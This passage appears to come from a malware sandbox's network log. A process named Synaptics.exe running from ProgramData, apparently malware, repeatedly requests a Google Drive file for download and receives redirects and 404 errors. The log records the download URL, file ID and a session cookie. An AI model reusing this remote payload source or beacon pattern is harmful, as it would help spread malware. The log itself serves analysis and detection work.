                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:07 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC71VaAJcBcvCKWyCa9BMGU2nZlyp8GtXolj-lQsOz5bNUKYd1kWdw9eAhHRrDtBGwrT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:07 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8nVV3S4L_3FyQxwlvWNlJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:07 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:07 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="adptltvsOgf5GzBrJWK4xA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:07 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49751 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:14 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:14 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x6oW3kMRFZBK1U46azDRZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49752 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:14 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:14 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-P6BXlih2mwyBOVQt2ur2Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49759 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:15 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-2frcjEo0qJf9QSxHlujirA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49757 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:15 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:15 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7R7cFxHHtcni0KPFTj5q7gcGz3m9hostSfU-fTNgGDYaOt5FkB4DphgEuYoOUVoeQ1
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Blns3e0y17h3wWXwHASITg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="xsuLiW9cvHZDbNCUyGcs6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            20 | 192.168.2.8 | 49758 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6-1JdaQmk17vmEfhkT175RaNvBIADOPkLIBECW2mQlgEB6zXA9BGAaM-rtx6_k7Xwt
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kg5RHtC-4wM3TL9NMBvF7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="RubWGN09Bq_qL_TC6FbSvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            21 | 192.168.2.8 | 49756 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-m6QYlABmYv6mTwNThfnFpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            22 | 192.168.2.8 | 49762 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:16 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:16 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5QpUgdRP6MCVpKSz8l7xbMelIWQQJjtXR-FXs2PUCTgNbo6W2OW67FslBwXge6LLAgpd6NV64
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-jXj_LjpmeKAe1s8vFFvzjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:16 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:16 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="XrbaJl7_qMNVRTApqixv7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:16 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            23 | 192.168.2.8 | 49761 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:16 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GKOrkWo0ZBSg1gOg9EhJzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49763 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:16 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
